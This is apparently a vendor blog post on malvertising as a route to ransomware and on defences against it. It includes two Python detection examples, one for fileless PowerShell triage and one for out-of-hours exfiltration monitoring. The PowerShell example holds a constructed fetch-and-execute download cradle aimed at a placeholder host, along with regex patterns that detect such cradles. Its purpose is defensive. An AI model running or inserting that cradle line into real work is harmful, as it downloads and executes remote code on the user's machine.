Published On: February 10th, 2023 | 15 min read | Categories: Ransomware

Malvertising: What is it and How Can it Lead to a Ransomware Attack?

While there are a wide range of cyberthreats facing every business today, one of the most dangerous is malvertising. This technique seeks to use people’s everyday web browsing activities against them by injecting malware into seemingly innocent online ads. One click on an infected ad can expose businesses to a range of problems, such as data theft.

Malvertising is hard to spot and can be even harder to block, and the consequences of this type of attack can be severe. Therefore, understanding what malvertising is, how it works and how it can be stopped must play an important role in any malware protection strategy. So what do you need to know?

What is a Malvertising Attack?

Malvertising refers to a way of getting malicious software onto a computer or network, and it can be one of the most dangerous and effective attack vectors for cybercriminal groups. 

Unlike tactics such as phishing, which often rely on careless behavior from end users, malvertising can spread silently even when individuals are following cybersecurity best practice guidelines. As such, it’s easy for it to go unnoticed until it’s too late.

Once inside a network, cybercriminals can use this malicious code to hunt down and exfiltrate valuable data. Therefore, it’s something cybersecurity professionals need to be especially mindful of if they are to implement a successful information security strategy.

What is the Meaning of Malvertisements?

Malvertising is a combination of malware and advertising and, as the name implies, it refers to malicious software that spreads via online advertising – most often those ads that are displayed when using web browsers.

Typically, malvertising works by hackers infiltrating ad networks to plant their malware within third-party ads. These are then displayed to users as normal harmless ads – until they click. Whether intentional or not, once the ad is clicked, malicious code is downloaded. 

One of the factors that makes malvertising so dangerous is that it can appear almost anywhere. The vast majority of publishers use third-party ad networks on their websites, providing easy targeting and great reach for cybercriminal gangs. This means that almost any website that carries advertising can potentially be infected with ad malware, including those trusted sites that many people visit as part of their everyday browsing.

What are Examples of Malvertising Attacks?

While the simplest and most common type of malvertising injects malicious code into a user’s machine when they click on ad malware, this is just one form of attack. There are also a range of other methods of executing malware attacks through online advertising that do not require a user to directly interact with an infected ad.

There are a range of ways in which malvertising delivers threats. For example, a user may see a banner ad promoting a special offer, which when clicked, takes them to a legitimate-looking site that says the product on sale is actually out of stock. By the time the visitor leaves the site, they will have already been infected. Other techniques include hiding malware within banner ad pixels or in videos. 

However, users do not even have to click to fall victim. One form of attack is a ‘drive-by download’. This exploits vulnerabilities within the browser itself to infect a system when the ad is viewed, even if the user does not directly interact with it.

These techniques have been used in malvertising attacks that have appeared on some of the world’s highest-profile and most-visited websites, including the New York Times, the BBC, Forbes and the NFL. All of these brands have been used as carriers for malvertising in recent years as a result of their partnerships with legitimate third-party advertisers that have become targets for malware groups.

Does Malvertising Affect Mobile Devices?

While many malvertising attacks use vulnerabilities within desktop versions of popular web browsers, mobile malvertising is increasingly popular as many people’s browsing habits have changed. This can be particularly dangerous for a number of reasons. 

Firstly, with smaller touchscreens, it’s often easier for users to click on ads by accident. What’s more, ad blockers are less common on mobile devices, so more users are likely to see the infected ads, increasing the chance of infection. 

Finally, antivirus protections are also less frequently used on mobiles – especially on personal devices that may also be used to connect to business networks. For example, notes that, while 77 percent of adults in the US use antivirus software, only 24 percent of these users have antivirus solutions installed on their smartphones.

How can Attackers Publish Malvertisements on Legitimate Websites?

 Almost two-thirds of internet users have clicked on a Google ad

One of the most dangerous aspects of a malvertising campaign is how it uses everyday publishers to deliver its packages. Many people may believe that as long as they stay away from risky, obscure or untrusted web content they can avoid falling victim to malware. But with malvertising, this is not the case.

A common attack vector for these threats is to target third-party advertisers, such as Google Ads, AdPlugg or Propeller Ads. According to research from Hubspot, for example, 63 percent of people have clicked on a Google ad.

If hackers are able to exploit vulnerabilities in these services, or even buy space on an ad network directly, they can easily reach huge audiences – and they only need a tiny percentage of these viewers to engage with the ad to be successful.

While publishers take great efforts to filter out malicious ads and reduce their own vulnerabilities, there are no guarantees. And these are not the only methods used. Some cybercriminals target sites that rent space directly to advertisers – which may often be smaller publishers with weaker protections – for the use of banner ads or popups.

How does Malvertising Relate to Ransomware?

While malvertising techniques can be used to deliver any type of malicious software, one of the most common threats is ransomware. Figures from Malwarebytes, for example, estimate that this type of malware attack is used in 70 percent of malvertising campaigns. 

The cost of falling victim to ransomware is significant, with the average incident setting a firm back millions of dollars in direct expenses and long-term remediation, so tackling this form of malicious code needs to be a key part of any firm’s data protection strategy.

How Can Malvertising Harm Me?

Malvertising can lead to a wide range of negative consequences. Some attacks may seek to install spyware or adware to track an individual’s activity, for example. However, the most dangerous types of malvertising attacks are those that seek to gain control of a user’s system or steal valuable data – with ransomware a key threat.

Some types of ransomware may block access to critical files or systems, for example. This can greatly harm productivity or even, in some circumstances, prevent a business from operating altogether until access has been restored, either by turning to backups or paying a ransom.

However, increasingly, it is data exfiltration attempts where the real harm of ransomware lies. This can result in major damage to a brand, both in financial and reputational terms, so any ransomware variant that uses this technique must be stopped before it can remove data from the network.

How Does Malvertising Ransomware Bypass Defenses?

Many of these ransomware threats are designed specifically to bypass the common defenses firms have in place.

The majority of antivirus software uses signature matching to detect malicious code, a technique that compares files to lists of known malware to look for key commonality. But increasingly, techniques such as fileless malware are being used to avoid these detection methods.

For example, one increasingly common tactic is to target vulnerabilities in systems such as PowerShell. BlackFog’s research suggests 87 percent of ransomware attacks in 2022 used this method, with ransomware groups favoring it due to its ability to evade detection by traditional defenses.
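Because a fileless PowerShell payload never lands on disk, a file-signature scanner has nothing to hash; what defenders can still inspect is the process command line or script-block log. The following is an added example written for this article, not BlackFog's product code: it triages constructed command lines for the indicators commonly tied to in-memory PowerShell use, decodes a `-EncodedCommand` blob (Base64 of UTF-16LE) so the hidden download cradle becomes visible, and uses assumed weights and an assumed alert threshold so that a single weak indicator (such as `-NoProfile` on a scheduled backup script) does not raise an alert on its own. The staged script uses a placeholder host that does not resolve.

```python
"""Triage PowerShell command lines for in-memory ("fileless") execution indicators.

Added example, not BlackFog's code. The command lines below are constructed to resemble
the CommandLine field of a process-creation record; no real malware is involved.
"""
import base64
import re
from typing import Dict, List, Optional

# Indicators widely associated with fileless PowerShell use, with assumed weights that
# reflect how often each one also shows up in routine administration.
INDICATORS = {
    # -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (UTF-16LE script)
    "encoded_command": (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I), 2),
    # code pulled from the network and executed without touching disk
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I), 2),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "no_profile": (re.compile(r"-nop\b|-noprofile", re.I), 1),
}
ALERT_THRESHOLD = 2  # assumption: one weak indicator alone is normal admin activity


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE); None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd: str) -> Dict[str, object]:
    """Return the matched indicators, a weighted score and the decoded script, if any."""
    hits = set()
    decoded = None
    for name, (pattern, _weight) in INDICATORS.items():
        match = pattern.search(cmd)
        if not match:
            continue
        hits.add(name)
        if name == "encoded_command":
            decoded = decode_encoded_command(match.group(1))
    # The cradle is usually hidden inside the encoded script, so check the decoded text too.
    if decoded and INDICATORS["download_cradle"][0].search(decoded):
        hits.add("download_cradle")
    score = sum(INDICATORS[name][1] for name in hits)
    return {
        "hits": sorted(hits),
        "score": score,
        "suspicious": score >= ALERT_THRESHOLD,
        "decoded": decoded,
    }


def encode_for_powershell(script: str) -> str:
    """Produce the Base64/UTF-16LE form PowerShell expects; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. The staged script points at a placeholder host that does not resolve.
STAGED_SCRIPT = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",  # routine
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(STAGED_SCRIPT),       # fileless
    "cmd.exe /c dir C:\\Users",                                                          # unrelated
]


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Analyze every command line and attach the original text to each result."""
    return [dict(command=line, **analyze_command_line(line)) for line in lines]


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        flag = "ALERT" if result["suspicious"] else "ok   "
        print(flag, result["score"], result["hits"], result["command"][:60])
```

The decoding step is what makes the difference: on the raw command line the second sample only shows an encoded blob, a hidden window and `-nop`; once the blob is decoded the download cradle inside it is visible and the score climbs well past the threshold, while the backup script stays below it.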

What are the Consequences of a Ransomware Malvertising Infection?

BlackFog research also indicates that almost nine out of ten ransomware attacks (89 percent) exfiltrate data. This can then be used for a number of purposes, from being sold for profit on the dark web to extorting organizations directly – i.e., demanding a payment in order not to release the data.

Ransomware is big business, and very costly for firms. In 2022, for example, we found the average ransomware payout reached over $258,000. But this only covers the direct cost, before taking into account the cost of recovering systems, investigating incidents and compensating users. It also does not consider the reputational damage a firm can experience if it loses its customers’ personal data. All put together, the average ransomware attack now costs firms $4.54 million, according to IBM.

In the worst-case scenario, a ransomware attack could result in the organization being forced to shut down completely – as was the case in 2022 when the 157-year-old Lincoln College in Illinois closed for good following a ransomware attack.

How do I Protect Against Malvertising?

Given the damage that malicious advertising can do, it’s essential firms have a plan to prevent this type of malware infection. However, relying on tried-and-tested security methods alone may not be enough to tackle the most sophisticated threats.

How can I Avoid Malvertising Infections?

One of the most common ways to prevent malvertising is to use an ad blocker. Usually, if the malicious code is prevented from making it to the user’s device, the threat is neutralized. However, there are limitations to this approach. 

For starters, free ad blockers usually operate as third-party extensions to desktop web browsers, which means they add weight to a system and increase loading times. In addition, there are privacy, security and even legality concerns over some free ad blockers, as evidenced by Google, which is restricting some services in upcoming versions of Chrome.

Finally, some malvertising campaigns are tailored to bypass ad blockers. The RoughTed malware discovered in 2017, for example, was able to circumvent some of the most widely-used ad blockers’ filters, so it isn’t safe to assume that just because you’re blocking online ads, you’re safe from malvertising.

Can Antivirus Tools Protect Me From Malware?

The other common first line of defense against a malicious advertisement is the use of antivirus software. But again, this has limitations. As noted above, increased use of fileless malware by cybercriminals has blunted the effectiveness of these solutions, while attacks that take advantage of zero-day vulnerabilities can often evade detection.

As such, you can’t rely solely on these security software solutions to prevent malware from entering your business, as sooner or later, it’s highly likely that an attack will be able to break through these perimeter defenses. However, this does not mean it’s too late to do anything – with the right tools you can still block the most harmful activities, such as data exfiltration, and protect your business from the most dangerous threats.

How can I Know if I’m Infected With Ransomware?

While prevention is always better than cure, this isn’t always possible. Especially when it comes to malvertising, the techniques used by cybercriminals often make it easy for an online ad to infect your network with malicious code, even if you are protected by antivirus software and have employees that are not behaving carelessly.

In such cases, it’s essential you are able to detect threats such as ransomware as quickly as possible so you can take the right steps to remove it before it has a chance to do damage. This means using advanced detection and response (XDR) technology and embracing tools such as artificial intelligence (AI) and ADX to spot suspicious activities within your network.

According to IBM, firms with XDR solutions in place reduce their time to detection by 29 days, while the full use of AI and automation can cut the total cost of a breach by as much as $3.05 million. Such tools can automatically monitor systems, looking for unusual activity such as large, out-of-hours data transfers, or repeated requests from users to access unauthorized systems.

The downside of many endpoint protection tools, however, is that not all responses are automated and human intervention is still required to manage threats. Newer technologies such as ADX, on the other hand, offer fully automated 24/7 protection. 

What can I do to Protect my Data From a Ransomware Attack?

Data protection needs to be at the heart of any good ransomware strategy – but this is about much more than simply having comprehensive backups available to restore from in the event files are locked or destroyed. The biggest threats come when data is stolen from the network, so efforts to prevent this are essential.

To prevent data exfiltration, you need dedicated endpoint security solutions that can be deployed across every device in order to monitor outgoing traffic and block any unusual activity automatically.

Effective anti data exfiltration (ADX) solutions should be lightweight enough to be deployed across every endpoint on your network, including smartphones and other mobile devices. This ensures they can monitor all traffic and stop it at the point of exfiltration, before it ends up in the hands of ransomware groups.
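The two detection behaviours described on this page, spotting large out-of-hours data transfers and repeated requests for unauthorized access (from the XDR/AI section above) and monitoring outgoing traffic per endpoint so it can be blocked at the point of exfiltration (this section), can be illustrated in one small monitor. What follows is an added example written for this article, not BlackFog's ADX logic: the log lines are constructed, the six-field layout (timestamp, user, host, destination, bytes, action) is an assumption, and so are the business-hours window, the size threshold and the denied-request burst count. It aggregates outbound bytes per host and destination outside business hours rather than judging each transfer alone, so that a payload split into several smaller transfers still crosses the threshold.

```python
"""Flag out-of-hours outbound transfers and access-denied bursts from outbound traffic logs.

Added example, not BlackFog's product code. Log lines are constructed; the field layout
and the policy values below are assumptions chosen for the demonstration.
"""
from collections import defaultdict
from datetime import datetime, time
from typing import Dict, List

# Assumed policy values.
BUSINESS_START = time(8, 0)          # business hours run 08:00 to 18:00, Monday to Friday
BUSINESS_END = time(18, 0)
LARGE_BYTES = 50 * 1024 * 1024        # 50 MiB outbound, per host and destination, out of hours
DENIED_BURST = 5                      # this many denied requests by one user is a burst

# Constructed log lines: "<ISO timestamp> <user> <host> <destination> <bytes> <allowed|denied>".
LOG_LINES = [
    "2023-02-09T09:15:02 alice ws-12 crm.example.internal 1200000 allowed",
    "2023-02-09T23:41:10 svc-backup ws-07 203.0.113.10:443 340000000 allowed",
    "2023-02-09T23:42:30 svc-backup ws-07 203.0.113.10:443 120000000 allowed",
    "2023-02-10T02:10:00 dave ws-09 198.51.100.5:443 30000000 allowed",  # each below threshold,
    "2023-02-10T02:11:00 dave ws-09 198.51.100.5:443 30000000 allowed",  # together above it
    "2023-02-09T12:00:00 carol ws-05 share.example.internal 80000000 allowed",  # large, in hours
    "2023-02-09T10:02:00 bob ws-03 fileserver.example.internal 0 denied",
    "2023-02-09T10:02:05 bob ws-03 hr.example.internal 0 denied",
    "2023-02-09T10:02:09 bob ws-03 finance.example.internal 0 denied",
    "2023-02-09T10:02:14 bob ws-03 backup.example.internal 0 denied",
    "2023-02-09T10:02:20 bob ws-03 admin.example.internal 0 denied",
    "2023-02-09T11:30:00 erin ws-04 finance.example.internal 0 denied",  # one typo, not a burst
]


def parse_line(line: str) -> Dict[str, object]:
    """Split one constructed log line into typed fields."""
    ts, user, host, dest, nbytes, action = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "user": user,
        "host": host,
        "dest": dest,
        "bytes": int(nbytes),
        "action": action,
    }


def is_out_of_hours(ts: datetime) -> bool:
    """True on weekends and outside the assumed business-hours window."""
    if ts.weekday() >= 5:
        return True
    return not (BUSINESS_START <= ts.time() < BUSINESS_END)


def analyze(lines: List[str]) -> Dict[str, object]:
    """Aggregate out-of-hours outbound bytes per (host, dest) and count denied requests per user."""
    out_of_hours_bytes = defaultdict(int)
    denied_by_user = defaultdict(int)
    for rec in map(parse_line, lines):
        if rec["action"] == "denied":
            denied_by_user[rec["user"]] += 1
        elif is_out_of_hours(rec["ts"]):
            out_of_hours_bytes[(rec["host"], rec["dest"])] += rec["bytes"]

    flagged = [
        {"host": host, "dest": dest, "bytes": total}
        for (host, dest), total in sorted(out_of_hours_bytes.items())
        if total >= LARGE_BYTES
    ]
    bursts = {user: n for user, n in denied_by_user.items() if n >= DENIED_BURST}
    # Hosts whose outbound traffic an ADX-style control would stop at the point of exfiltration.
    block_hosts = sorted({entry["host"] for entry in flagged})
    return {"flagged_transfers": flagged, "denied_bursts": bursts, "block_hosts": block_hosts}


if __name__ == "__main__":
    report = analyze(LOG_LINES)
    for entry in report["flagged_transfers"]:
        print("large out-of-hours transfer:", entry)
    for user, count in report["denied_bursts"].items():
        print(f"repeated unauthorized access attempts: {user} ({count} denied)")
    print("hosts to block:", report["block_hosts"])
```

Note that ws-09 is flagged only because the two 30 MB transfers are summed per host and destination; judged individually each would pass, which is the weakness a per-event rule has. Carol's 80 MB transfer during business hours is left alone, so in practice the hours-based rule would sit alongside per-user baselines rather than replace them.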

To be at their most effective, these tools should be used as part of a holistic, defense-in-depth approach that can protect firms against all forms of malware, including threats delivered via a malicious ad. By doing this, firms can rest assured that even if their first lines of protection are bypassed, efforts to steal data can still be identified and prevented before they can do damage.
